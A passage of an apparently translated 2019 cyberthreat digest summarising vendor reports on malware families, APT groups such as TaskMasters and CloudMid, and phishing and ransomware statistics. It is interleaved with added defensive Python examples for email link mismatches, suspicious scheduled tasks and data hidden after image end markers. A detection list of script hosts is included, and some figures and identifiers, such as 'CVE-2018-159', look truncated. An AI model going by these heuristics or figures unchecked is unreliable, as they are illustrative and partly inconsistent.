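            findings.append(f"link text shows {shown_host} but points to {real_host}")
    return {"visible_text": normalise_text("".join(view.text)),
            "links": view.links, "findings": findings}


if __name__ == "__main__":
    result = analyse_email(SAMPLE_EMAIL)
    print(result["visible_text"])
    for finding in result["findings"]:
        print("-", finding)
```

Keyword and brand rules should run against `visible_text`, not the raw body, and the findings themselves (encoded plain letters, hidden filler, display/href mismatch) are strong signals on their own, since they have no purpose in a legitimate message.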

"Neither cloud storage nor our smartphones and e-mail, no environment is insured against cyber attacks. Threats such as targeted ransomware attacks, DNS attacks and cryptominers will remain relevant in 2019. Security experts must keep up with the latest threats and attack techniques to provide the best level of protection for their organizations"

Types of malware according to Check Point Software Technologies

The most active malware of the first half of 2019, according to Check Point Software Technologies:

  1. Emotet (29%) is an advanced, self-propagating modular trojan. Emotet was once used as a banking trojan and has recently been used to deliver other malware or malicious campaigns. It uses several methods to avoid detection. It also spreads through phishing spam messages containing malicious attachments or links.
  2. Dorkbot (18%) is an IRC-based worm intended for remote code execution by its operator. It can also be used to download additional malware onto the infected system to steal confidential information.
  3. Trickbot (11%) is a variant of Dyre that appeared in October 2016. Since its first appearance it has mainly targeted banks in Australia and the United Kingdom, and has recently begun to appear in India, Singapore and Malaysia as well.

The most active cryptominers of the first half of 2019:

  1. Coinhive (23%) is a cryptominer designed to mine the Monero cryptocurrency without the user's knowledge while the user visits websites. Coinhive appeared only in September 2017, but as of August 2019 it had already hit 12% of organizations worldwide.
  2. Cryptoloot (22%) is a miner embedded in websites using JavaScript code. It mines Monero without the user's permission.
  3. XMRig (20%) is open-source software first detected in May 2017. It is used for mining Monero.

The most active mobile threats of the first half of 2019:

  1. Triada (30%) is a modular backdoor for Android that grants superuser privileges to downloaded malware and helps embed it in system processes. Triada has also been seen substituting URLs loaded in browsers.
  2. Lotoor (11%) is a tool that exploits vulnerabilities in the Android operating system to obtain privileged root access on compromised mobile devices.
  3. Hidad (7%) is a modular backdoor for Android that grants superuser rights to downloaded malware and helps embed it in system processes. It can gain access to key security components built into the OS, which allows it to obtain the user's confidential data.

Malicious mobile software called Agent Smith was very active in Russia. Under the guise of a hidden Google-related application, the malware exploits known Android vulnerabilities and automatically replaces installed applications with malicious versions without the user noticing. Users downloaded the application from the popular unofficial app store 9Apps. As of August 2019, Agent Smith had infected about 57 thousand devices in Russia.

Top of malware according to Check Point Software Technologies

Top banking malware of the first half of 2019:

  1. Ramnit (28%) is a banking trojan that steals bank account credentials, FTP passwords, session cookies and personal data.
  2. Trickbot (21%) is the dominant banking trojan, constantly being extended with new capabilities, functions and propagation vectors. This makes Trickbot a flexible, configurable malware that can be distributed within multi-purpose campaigns.
  3. Ursnif (10%) is a trojan running on the Windows platform. It is usually distributed through the Angler and Rig exploit kits. It can steal information related to VeriFone Point-of-Sale (POS) payment software. To do this, the trojan contacts a remote server to upload the collected information and receive instructions. It then downloads files onto the infected system and executes them.

The report for the first half of 2019, "Cyber Attack Trends: Annual Report 2019", shows the full landscape of cyberthreats. Its conclusions are based on data from the Global Threat Impact Index and the ThreatCloud Map, which were developed by ThreatCloud intelligence, a collaborative network for fighting cybercrime that provides data on threats and attack trends from a global network of threat sensors.

The CloudMid spyware attacked Russian healthcare organizations

On July 18, 2019 Kaspersky Lab reported that Russian healthcare organizations had faced targeted cyber espionage.

Kaspersky Lab experts recorded a series of targeted attacks on Russian healthcare organizations. The incidents occurred in spring and early summer 2019; several organizations in the southern regions of Russia fell victim to the attackers. According to the analysts, the attackers speak Russian fluently but are located outside Russia. Their main objective was collecting financial information.

Computers in healthcare organizations were infected with previously unknown spyware named CloudMid. The malware was sent by e-mail, masquerading as the VPN client of a well-known Russian company. The mailing was not mass, however: only a few organizations in certain regions received e-mails containing the spyware, which points to the targeted nature of the attack.

Once installed on a system, CloudMid started collecting the documents stored on the infected computer. In particular, the malware took screenshots several times a minute. Kaspersky Lab experts found that the attackers collected financial information from the infected machines: contracts, referrals for expensive treatment, invoices and other documents relating to the financial activities of healthcare organizations.

The healthcare sector has started to attract cybercriminals, including the organizers of complex and covert targeted attacks. The CloudMid spyware mailing we detected is another confirmation of this. In this case the attacks were not technically sophisticated, but they were targeted, and the attackers still managed to get what they wanted. For this reason healthcare organizations should pay special attention to cyber security, in particular by training employees to recognize threats and by using reliable protective solutions,
noted Dmitry Kuznetsov, anti-virus expert at Kaspersky Lab

Kaspersky Lab solutions detect all known samples of the CloudMid spyware and protect users from this threat.

Ransomware has been succeeded by more targeted types of attacks

On May 23, 2019 Fortinet published the results of its quarterly Global Threat Landscape Report on global security risks.

According to the company, the research shows that cybercriminals continue to refine their attack methods, including using purpose-built ransomware, creating custom code for a number of targeted attacks, and even using LoTL attacks and shared infrastructure to expand their capabilities.

Main findings of the research:

  • Pre-compromise activity is three times higher during the business week, while post-compromise traffic is less differentiated in this respect.
  • Some threats use shared, common infrastructure more often than unique or specialized infrastructure. An example of the technologies receiving special attention from cybercriminals recently is the web platforms that make it easier for users and enterprises to build websites.
  • Ransomware has not disappeared; it has become more targeted and is aimed at wealthier victims.
  • Attackers increasingly use dual-purpose tools, or tools already installed on target systems, to carry out cyber attacks.

The research, which set out to find out whether attackers split their attacks into separate stages carried out on different days of the week, showed that cybercriminals always aim to make maximum use of the opportunities available to them. Comparing web-filtering volumes for two phases of the cyber kill chain on weekdays and at weekends showed that pre-compromise activity is three times higher during the business week, while post-compromise traffic is less differentiated in this respect. This is mainly explained by the fact that exploiting vulnerabilities often requires someone to take an action, for example to follow a link in a phishing e-mail. In contrast, command-and-control (C2) activity has no such requirement, so it can be observed at any time. Cybercriminals understand this and try to make maximum use of opportunities during the business week, when users are most often online.

The extent to which different threats use a given infrastructure gives an idea of a number of important trends. Some threats use shared, common infrastructure more often than unique or specialized infrastructure. Nearly 60% of threats were carried out within at least one shared domain, which in turn indicates that most botnets use already established infrastructure. The IcedID trojan is an example of this "why buy or build when you can borrow" approach. Moreover, when threats use a certain shared infrastructure, they usually do so at the same stage of the kill chain. Situations in which a threat uses a certain domain for reconnaissance and vulnerability scanning and then relays C2 traffic through the same domain are quite rare. This means that infrastructure plays a special role in malicious campaigns. Understanding which threats use the same infrastructure, and at which points of the attack chain, allows organizations to predict potential points of growth and change in malware or botnets in the future.

Attackers typically move from one opportunity to another in whole clusters, targeting the most successfully exploited vulnerabilities and the technologies currently on the rise, in order to seize the opening quickly. An example of the technologies receiving special attention from cybercriminals as of May 2019 is the web platforms that make it easier for users and enterprises to build websites. These platforms, together with plug-ins from third-party developers, remain a widespread target for cybercriminals. All this confirms the need to install security updates immediately, and requires organizations to fully understand the constantly evolving world of cyber-threats if they want to stay a step ahead of hackers.

In general, the previously popular ransomware has been succeeded by more targeted types of attacks, but this does not mean ransomware has disappeared altogether. Rather, it has become more purposeful and is focused on wealthier victims. One example is LockerGoga, which is used in targeted multi-stage attacks. In terms of functional complexity this program differs little from other similar ransomware, but where most similar tools use some level of obfuscation to hide from antiviruses, analysis of this program revealed no significant obfuscation. This indicates the targeted nature of the attack and that, when creating the program, the attackers knew the future victims would not be specifically looking for this malicious code. Another example is Anatova. As with most other ransomware, Anatova's main goal is to encrypt as many files as possible on the victim's system, except for files that could affect the stability of the infected system. In addition, the program avoids computers that look as though they are used for malware analysis or as decoys. Both of these ransomware variants indicate that security leaders should still apply timely updates and perform data backups to protect against ordinary ransomware. But countering targeted threats and unique attack methods requires more specialized protection.

Since attackers use the same business models as their victims to achieve the maximum effect from their activity, attack methods often continue to evolve even after a successful debut. To this end, attackers increasingly use dual-purpose tools, or tools already installed on target systems, to carry out cyber attacks. This tactic, known as "living off the land" (LoTL), allows hackers to disguise their activity as quite innocent processes, making detection harder. These tools also considerably aggravate the consequences of an attack. Unfortunately, attackers can use a wide variety of legitimate tools that allow them to achieve their goals and stay out of sight. For competent protection against such attacks, organizations should restrict access to authorized administration tools and log files in their environments.

To improve an organization's ability not only to defend itself properly against threats but also to prepare for the evolution and automation of future attacks, intelligent tools for predictive threat analysis are needed that are available across the whole distributed network. The knowledge gained will help reveal trends, assess the evolution of the various methods aimed at the digital attack surface, and set cyber-hygiene priorities based on where attacker activity is directed. The value of this analysis, and the ability to act on its data, is considerably reduced without security controls that can apply the retrieved data in real time. Only with a large-scale, integrated and automated platform approach to security is it possible to provide fast, large-scale protection for the whole networked environment, from the Internet of Things and the periphery to the network core and multi-cloud infrastructures.

Unfortunately, we still see that the cybercriminal community takes into account the national strategies and methodologies, as well as the technical features of the devices and network technologies that their attacks target. Organizations should review their strategies in order to be better protected from cyber-risks and learn to manage them more effectively. One of the first important steps is to treat cyber security as a science and to attend to the foundations of the infrastructure with the utmost scrupulousness, which in turn requires providing the high speed and network coherence of cyberspace needed for effective protection. Using a platform approach to security, micro- and macro-segmentation, machine learning technologies and automation as the building blocks of artificial intelligence opens huge opportunities for effectively countering cybercriminals.

Phil Quade, Chief Information Security Officer of Fortinet

The TaskMasters cybergroup attacks organizations in Russia and the CIS

On May 13, 2019 Positive Technologies reported that experts of its Expert Security Center had detected a cybergroup, presumably of Asian origin. The attackers hit more than 30 organizations from different industries, including manufacturing, power and oil and gas, in Russia, the CIS and other countries. A considerable number of the victims were in Russia and the CIS. The group's main goal is theft of organizations' confidential information. The group has been active for at least several years: traces of TaskMasters activity dating back to 2010 have been found.

The group used an unusual method of gaining a foothold in IT infrastructure: its members created specific tasks in the task scheduler (hence the name TaskMasters). The task scheduler allows OS commands to be executed and software to be started at the time specified in a task. The AtNow scheduler used by the group allows tasks to be run not only locally but also on remote computers on the network, regardless of those nodes' time settings. In addition, this utility does not require installation. All this simplifies attack automation.
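As an added example (not Positive Technologies' code), a triage routine that reads scheduled-task definitions as they are recorded when a task is created and flags the traits a scheduler-based foothold tends to show: a hidden task, a binary outside the usual program directories, a script host carrying its payload in the arguments, and execution as LocalSystem. The records, task names and paths are constructed for the example; the XML follows the Task Scheduler schema that Windows records in event 4698.

```python
"""Added example (not from Positive Technologies): triage scheduled-task
creation records for signs of scheduler-based persistence.

The records are constructed here; their TaskName/TaskContent fields mimic the
Windows Security event 4698 ("A scheduled task was created"), whose
TaskContent is the task definition XML in the Task Scheduler schema.
"""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a task binary is normally expected to live in (lower-case).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Interpreters whose arguments, not the binary itself, carry the real payload.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
LOCAL_SYSTEM_SID = "S-1-5-18"


def _normalize_path(command: str) -> str:
    """Lower-case the command, strip quotes and expand the two most common
    Windows variables so %SystemRoot%\\... compares equal to c:\\windows\\..."""
    cmd = command.strip().strip('"').lower()
    for var in ("%systemroot%", "%windir%"):
        cmd = cmd.replace(var, "c:\\windows")
    return cmd


def triage_task(task_xml: str) -> list[str]:
    """Return human-readable reasons the task looks suspicious (empty = clean)."""
    root = ET.fromstring(task_xml)
    reasons: list[str] = []

    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS)
    if hidden.strip().lower() == "true":
        reasons.append("task is hidden from the scheduler UI")

    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = _normalize_path(exec_node.findtext("t:Command", default="", namespaces=NS))
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
        base = cmd.rsplit("\\", 1)[-1]
        if "\\" not in cmd:
            reasons.append(f"command has no full path: {cmd}")
        elif not cmd.startswith(TRUSTED_DIRS):
            reasons.append(f"binary outside trusted directories: {cmd}")
        if base in SCRIPT_HOSTS and args:
            reasons.append(f"script host launched with arguments: {base} {args}")

    user_id = root.findtext(".//t:Principal/t:UserId", default="", namespaces=NS).strip()
    if reasons and user_id == LOCAL_SYSTEM_SID:
        reasons.append("runs as LocalSystem")
    return reasons


# Minimal task definition in the Task Scheduler schema (constructed template).
TASK_TEMPLATE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>{user}</UserId></Principal></Principals>
  <Settings><Hidden>{hidden}</Hidden></Settings>
  <Triggers><TimeTrigger><StartBoundary>{start}</StartBoundary></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>{command}</Command><Arguments>{args}</Arguments></Exec></Actions>
</Task>"""

# Constructed sample records: one benign built-in task, two that deserve a look.
SAMPLE_RECORDS = [
    {"TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": TASK_TEMPLATE.format(user="S-1-5-18", hidden="false",
                                         start="2019-04-02T03:00:00",
                                         command="%windir%\\system32\\defrag.exe", args="-c -h -o")},
    {"TaskName": "\\UpdateSvc", "SubjectUserName": "admin",
     "TaskContent": TASK_TEMPLATE.format(user="S-1-5-18", hidden="true",
                                         start="2019-04-02T03:15:00",
                                         command="C:\\ProgramData\\svc\\update.exe", args="-s")},
    {"TaskName": "\\Cleanup", "SubjectUserName": "jdoe",
     "TaskContent": TASK_TEMPLATE.format(user="S-1-5-21-1000", hidden="false",
                                         start="2019-04-02T09:00:00",
                                         command="cmd.exe", args="/c C:\\Users\\Public\\run.bat")},
]


def triage_records(records: list[dict]) -> dict[str, list[str]]:
    """Map each task name to its findings, skipping tasks with none."""
    findings: dict[str, list[str]] = {}
    for rec in records:
        reasons = triage_task(rec["TaskContent"])
        if reasons:
            findings[rec["TaskName"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_records(SAMPLE_RECORDS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```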

After penetrating a local network, the attackers explore the infrastructure, exploit vulnerabilities, load malware onto compromised nodes and use them remotely for espionage. Such attacks can be detected using specialized protective tools, including PT Network Attack Discovery, and professionals in cyberincident investigation should be brought in to analyze and prevent the attacks.
Alexey Novikov, director of the Positive Technologies Expert Security Center

Positive Technologies experts assume that members of the TaskMasters group may be residents of Asian countries. References to Chinese developers occur in the code of the tools they use, connections from IP addresses in China were recorded during some attacks, and keys for some versions of the programs can be found on forums where residents of that country communicate. In addition, many utilities from the TaskMasters toolkit contain error messages and other debug information written in English with mistakes, which indicates that it is not the developers' native language.

Over the last two and a half years, specialists of the Positive Technologies Expert Security Center have carried out more than fifty information security incident investigations, including the detection of the ICEFOG group, identification of APTs against state and private companies, and investigation of the actions of the Cobalt group, whose members' activity experts managed to detect even after the arrest of its leader.

Cyber attacks left Venezuela without power for several days

March 11, 2019 was the fifth consecutive day without electricity in almost all of Venezuela. The country's president, Nicolás Maduro, said that cyber attacks from the USA were the cause of the blackout. Read more here.

Damage from a coordinated global cyber attack is assessed

According to information from January 29, 2019, a coordinated global cyber attack could cause damage of between $85 billion and $193 billion. Specialists from the Lloyd's of London insurance market and the financial company Aon reached this conclusion based on stress testing carried out for risk assessment.

Such an attack would lead to insurance claims covering different aspects, from business interruption and cyber-extortion to the costs of responding to cyberincidents.

Within the global cyber attack scenario, the experts predict total insurance payouts ranging from $10 billion to $27 billion.

A number of world sectors could suffer from the cyber attack, according to the experts' forecast; the greatest losses would be suffered by organizations in healthcare, retail, banking and manufacturing.

Material losses would be greatest in countries with well-developed economies (the USA and the states of Europe)[2].


Solar recorded 89% growth in the number of cyber attacks in Russia

On April 24, 2019 Rostelecom-Solar, a national provider of technologies and services for data asset protection, monitoring and information security management, presented its analytical report on cyber attacks on Russian companies in 2018.

The average daily stream of information security events processed by SIEM systems and used to deliver Solar JSOC services was 72.2 billion. In total, Solar JSOC specialists recorded over 765 thousand computer attacks in 2018, 89% more than the previous year. The share of critical incidents grew to 19%, reaching the highest value since 2015. This trend indicates that attackers' tools continue to improve. The pace of their creation also accelerated sharply in 2018: two days after information on the CVE-2018-159 vulnerability appeared, the Cobalt group was already sending out malware exploiting it.

In the second half of 2018 the number of attacks aimed at gaining control over IT infrastructure grew by 20%. Attackers seek to establish themselves covertly in the infrastructure, study it in detail and gain deeper access to information and technology systems.

We observe that at the initial stage attackers often use completely non-core tools: for example, cases of banking trojans being mailed to public authorities and power organizations are frequently recorded. The controlled botnet segments are then resold to other groups, and the attack is developed further using specialized tools.
Vladimir Dryukov, director of the Solar JSOC cyber attack monitoring and response center at Rostelecom-Solar

The number of attacks aimed at stealing money grew by 37% compared with the first half of the year. The development of information exchange within the community still allows credit and financial organizations to obtain timely information on how an attack is carried out and to interfere with attackers' actions. However, even having received information on a newly emerged type of cyber attack, not all companies take any protective measures. For example, despite the damage from the mass attacks of 2017-2018, as of April 2019 266,294 Russian servers are still exposed to the EternalBlue vulnerability, and 953 units of network equipment are running with the Cisco SMI protocol open. These organizations remain vulnerable to such seemingly outdated attacks as WannaCry or attacks on Cisco equipment.

2018 was also marked by a number of large virus infections of technology networks isolated from the Internet (the industrial control system segment). Since antivirus in such networks is updated manually, accidental infection of one node leads to rapid spread of the virus, while the threat elimination process, by contrast, takes several times longer than in a corporate segment.

According to Solar JSOC, about 70% of complex targeted attacks begin with phishing. On average, every 7th user who has not completed awareness training falls for social engineering. This indicator varies by the company's functional division, however: on average every fourth employee in legal services, every fifth in accounting, financial and economic services and logistics, and every sixth in the secretariat and technical support falls victim to phishing.

Another information security threat to organizations originating from employees is leakage of confidential data. In 2018 nearly half of all internal cybersecurity incidents involved such leaks. In roughly every fifth case, employees' actions led to the compromise of accounts for internal corporate IT systems. Non-management employees were usually responsible for internal incidents (about 60% of cases). The share of contractors and outsourcers usually fluctuated around 10%, but in the second half of the year it rose to 15.2%. This is probably because the spread of the service model contributes to the development of the outsourcing market, whereas the level of information security in Russian companies remains rather low.

Cybercriminals resort to increasingly sophisticated attack methods, including via IoT devices

Fortinet, a global developer of comprehensive integrated and automated cyber security solutions, published on March 7, 2019 the results of its Global Threat Landscape Report on global cyber security threats for the fourth quarter of 2018.

The modern era is characterized by the convergence of the digital and physical spaces. And though, in terms of our digital economy, this convergence promises inconceivable benefits and advantages, unfortunately it brings with it very real risks in terms of cyber security. Cybercriminals attentively monitor the situation and develop modern tools to exploit vulnerabilities, targeting this emerging digital convergence. Fundamental aspects of cyber security, including the ideas of transparency, automation and agile segmentation, are of special value and are the major factor for prosperity in our digital future. Only in this way will we be able to protect ourselves from the harmful activity of attackers.
Phil Quade, Chief Information Security Officer at Fortinet

According to the published data, cybercriminals resort to increasingly sophisticated attack methods, for example carrying them out via Internet of Things devices, which in most cases are not protected in any way, or adapting open-source malware to turn it into new threats. The main findings of the research include:

Index of threats Fortinet Threat Landscape Index

Record values of the exploit index

According to the Fortinet Threat Landscape Index, cybercriminals continued to work tirelessly even over the holidays. After a dramatic start, growth of the Exploit Index stopped in the second half of the quarter. Although the overall activity of cyber-attackers decreased slightly, the number of exploits per firm increased by 10%, and the number of unique exploits recorded grew by 5%. At the same time, botnets are becoming more complex and harder to detect. Botnet infection time grew by 15%, to approximately 12 days per firm. Since cybercriminals use automation and machine learning algorithms to spread attacks, security departments need to use the same tools to counter such modern and sophisticated attack methods.

Cyber attacks in Q4 2018 in figures

Surveillance of surveillance systems

The convergence of physical things and cyber security expands the attack surface, i.e. increases the number of objects under attack. Six of the twelve most widespread exploits targeted Internet of Things devices, and four of the six most widespread targeted IP surveillance cameras. Access to these devices allows cybercriminals to spy on private life, plan unlawful activity against physical facilities, or gain access to network systems to launch DDoS attacks or ransomware attacks. It is important to understand that attacks can be carried out even through the devices we use for monitoring and security.

Tools open to all

Open-source malicious tools are very useful to the information security community: with their help specialists can test defences, researchers can study various threats, and trainers can use real-world examples. The source code of such tools is published on numerous websites, for example GitHub. Since this code is available to anyone, attackers can also use it for illegal purposes. In particular, they can adapt and upgrade these malicious tools to implement threats, largely to create so-called ransomware, i.e. malware designed for extortion. An example where such malicious code was used to carry out attacks is the Mirai IoT botnet. Since its emergence in 2016, the number of different variants of this botnet has continued to grow steadily. For cybercriminals, such innovation opens up incredible opportunities.

The flowering of steganography

Advances in steganography are breathing new life into old types of attacks. Steganography is not usually used in the most common attacks, but last quarter the list of the most active botnets was headed by Vawtrak. This demonstrates that attackers are looking at this type of attack more and more closely. In addition, during the quarter researchers detected malware samples using steganography to hide malicious code directly in memes spread on social networks. During the attack, after attempting to contact the command server, the code looks for images in the corresponding Twitter feed, downloads them and then searches them for hidden commands for further propagation. This covert approach shows that attackers continue to experiment with different ways of developing malicious code.
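An added example, not from the Fortinet report, of one check a defender can run on images pulled from social feeds before they reach endpoints: walking the PNG chunk list or the JPEG marker structure to see whether bytes have been appended after the end-of-image marker, one common carrier for hidden data. The sample images are constructed in the block; the check inspects only the container, not pixel-level (LSB) hiding.

```python
"""Added example (not from the Fortinet report): detect bytes appended after an
image's end-of-image marker, one common carrier for hidden commands.
Only the container structure is inspected; pixel-level hiding is out of scope."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailer(data: bytes) -> bytes:
    """Walk the chunk list and return everything after the IEND chunk.
    Raises ValueError when the data is not a well-formed PNG up to IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):            # length(4) + type(4) + crc(4)
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) != crc:  # a damaged or forged chunk
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        pos = end
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("PNG has no IEND chunk")


def jpeg_trailer(data: bytes) -> bytes:
    """Walk marker segments and entropy-coded scan data; return bytes after EOI.
    Segments are skipped by their length, so a thumbnail embedded in APP1
    (which has its own EOI) cannot produce a false positive."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG file")
    pos, in_scan = 2, False
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            if not in_scan:
                raise ValueError(f"expected marker at offset {pos}")
            pos += 1                        # entropy-coded byte
            continue
        marker = data[pos + 1]
        if marker == 0xFF:                  # fill byte before a marker
            pos += 1
        elif marker == 0xD9:                # EOI
            return data[pos + 2:]
        elif marker == 0x00 or 0xD0 <= marker <= 0xD7 or marker == 0x01:
            pos += 2                        # stuffed 0xFF, RSTn or TEM: no length
        else:
            if pos + 4 > len(data):
                raise ValueError("truncated segment header")
            (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
            in_scan = marker == 0xDA        # SOS: scan data follows the header
            pos += 2 + seg_len
    raise ValueError("JPEG has no EOI marker")


def find_trailer(data: bytes) -> tuple[str, bytes]:
    """Dispatch on the file signature; returns (format, trailing bytes)."""
    if data.startswith(PNG_SIGNATURE):
        return "png", png_trailer(data)
    if data.startswith(b"\xff\xd8"):
        return "jpeg", jpeg_trailer(data)
    raise ValueError("unsupported image format")


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body)))


def build_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed 1x1 greyscale PNG with optional bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x80")                    # filter byte + pixel
    return (PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat)
            + _png_chunk(b"IEND", b"") + trailer)


def build_sample_jpeg(trailer: bytes = b"") -> bytes:
    """Constructed, structurally valid JPEG skeleton (not a decodable picture):
    SOI, a JFIF APP0 segment, a SOS header, four bytes of scan data containing
    one stuffed 0xFF00, then EOI and the optional trailer."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x00" * 9
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34"
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + trailer


if __name__ == "__main__":
    for sample in (build_sample_png(), build_sample_png(b"cmd:update"),
                   build_sample_jpeg(b"hidden-instruction")):
        fmt, extra = find_trailer(sample)
        print(fmt, "trailing bytes:", len(extra), extra[:32])
```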

Distribution through adware

Free software products with embedded advertising are still not just annoying but pose a real threat. At the global level, adware is the most widespread method of malware infection in most regions: it accounts for more than a quarter of all infections in North America and Oceania, and nearly a quarter in Europe. Since adware is very widespread in mobile app stores, this type of attack poses a serious threat, especially to unsuspecting mobile device users.

Monitoring operational technology

Due to the continuing convergence of information technology (IT) and operational technology (OT), the period under review saw relative changes in the prevalence and frequency of attacks on these environments. Unfortunately, both the prevalence and the frequency of attacks increased in most cases. In particular, the return of the Shamoon malware in a wave of attacks in December indicates that these destructive attacks may recur with greater force. A cyber attack aimed at an OT system, or even just at network-connected devices such as valves, sensors or switches, can lead to destructive physical consequences, including for critical infrastructure and services and the environment, and can even threaten people's lives.

The threat data provided in the research for the last quarter once again confirm many of the trends predicted by the global research firm FortiGuard Labs.

To anticipate attackers' actions, organizations need to transform their security strategy as part of their overall digital transformation work. They need a security platform that covers the entire networked environment, from Internet of Things devices to cloud infrastructures, and that integrates all security elements to minimize modern threats and protect the expanding attack surface. This approach allows organizations to share threat information quickly and at the proper level, reduces the necessary detection windows, and provides automated tools for neutralizing modern threats.

The number of attacks using malicious web addresses grew by 269%

On February 26, 2019 it became known that Trend Micro Incorporated had presented its annual overview of the cyber attacks that companies faced worldwide in 2018. The 2018 cyberthreat landscape was a mix of old threats that had renewed their activity (phishing, ransomware viruses) and threats that appeared not long ago (hidden mining, attacks on IoT device vulnerabilities, hardware vulnerabilities in processors).

Every two to three years the threat landscape changes considerably, so even the most modern approaches to protection rapidly lose their effectiveness. Modern enterprises need to approach security questions as flexibly as possible and regularly review decisions made earlier. Our threat report for 2018 is a tool for shaping the right directions for cybersecurity development at the modern enterprise.
Mikhail Kondrashin, technical director of Trend Micro in Russia and the CIS

2018 began with the discovery of the Meltdown and Spectre hardware vulnerabilities in processors. The patches quickly released in January 2018 could not fully fix the vulnerabilities and in some cases caused user complaints about "blue screens of death". By the end of 2018 the vulnerabilities had still not been completely eliminated.

2018 was also remembered for the entry into force of the European General Data Protection Regulation (GDPR). Regulators have already fined the first violators: a video surveillance system in Austria, 5,280 euros for violations in data storage and processing; a social network in Germany, 9.2 million euros for storing passwords unencrypted; a hospital in Portugal, 400 thousand euros for serious violations involving medical data.

Phishing became the main cyberthreat of the year. Compared with 2017, the number of attacks using malicious web addresses that were successfully blocked grew by 269%. In addition, the number of blocked attempts by users with unique IP addresses to visit a phishing site grew by 82%.

In total, in 2018 Trend Micro solutions blocked malicious URLs 6,876,981 times in Russia, 1,442,481 times in Ukraine and 71,147 times in Kazakhstan. In addition, 2,922,144 cases of infected software were recorded in Russia, 1,353,474 in Ukraine and 75,002 in Kazakhstan.

Attackers continue to compromise business correspondence (BEC). Using social engineering and crafting a familiar visual appearance and context for the email, they manage to bypass security and deceive the user. In 2018 such attacks grew by 28%.

Fileless malware is another attacker tool whose activity was recorded in 2018. This method increases the chance of remaining undetected during the attack and therefore of reaching the goal. By the end of 2018 more than 140 thousand such attacks had been recorded.

Office programs used in companies also became a target. Among the vulnerabilities disclosed in 2018, 60% were classified as "medium" severity, 3% more than in 2017, while the share of vulnerabilities with critical severity decreased from 25% (2017) to 18% (2018).

For example, Foxit, a PDF solution, had the largest number of vulnerabilities recorded, 257, followed by PDF software from Adobe with 239, Microsoft with 124, Apple with 66 and Google with 4.

The ransomware wave subsided: Trend Micro analysts note a sharp 91% decline in its activity. However, the WannaCry ransomware held its ground and remained one of the main threats: more than 600 thousand WannaCry attacks were detected in 2018.

Covert cryptomining reached a new peak in 2018: more than 1 million cases were recorded, a 237% increase over the year. The variety of attacks also grew over the year: advertising platforms, pop-up ads, malicious browser extensions and so on.

Trend Micro: about 48 billion cyber attacks blocked

On February 13, 2019 it became known that Trend Micro Incorporated had published statistics on cyberthreats worldwide for 2018, broken down by the most popular attack types and the most attacked countries. In 2018 the company's solutions processed more than 2.5 trillion requests. As a result about 48 billion attacks were blocked, including email threats, malicious files and URLs, and 222 ransomware "families" were identified.

Phishing remains the most popular and numerous cyberthreat. In total 41 billion cases were prevented over the year, although from November to December their number fell by 200 million. The highest level of cyber attacks was seen in the USA, where over 10 billion attacks were stopped; in China and Brazil the number of stopped attempts exceeded 2 billion, and in India 1.5 billion.

The .XLS format became the most widespread malicious attachment; 22 million spam attacks using it were recorded. The number of blocked URLs pointing to malware or to malware-hosting websites exceeded 1 billion. The countries whose residents most often encountered malicious URLs were led by Japan (160 million blocked attacks), the USA (155 million) and Taiwan (73 million).

The number of cyber attacks through business email compromise (BEC) increased: about 10 thousand cases were recorded in 2017 and more than 12 thousand in 2018. Typically, employees opened emails requesting payment on behalf of suppliers, or emails in which the sender posed as a lawyer or as the company's attorney responsible for confidential matters. The most popular scheme, however, was fraud involving a compromised executive account, or "imitation" emails sent on behalf of the CEO or CFO, with the aim of transferring money to accounts controlled by the attackers. Australia (4,230 blocked threats) and the USA (3,694 blocked threats) suffered most from such attacks.

The top five malware families at the end of 2018 were the CoinMiner cryptocurrency miner (1,350,951 attacks), the WannaCry ransomware (616,399 attacks), Powload (378,825 attacks), Downad (240,746 attacks) and Sality (166,981 attacks).

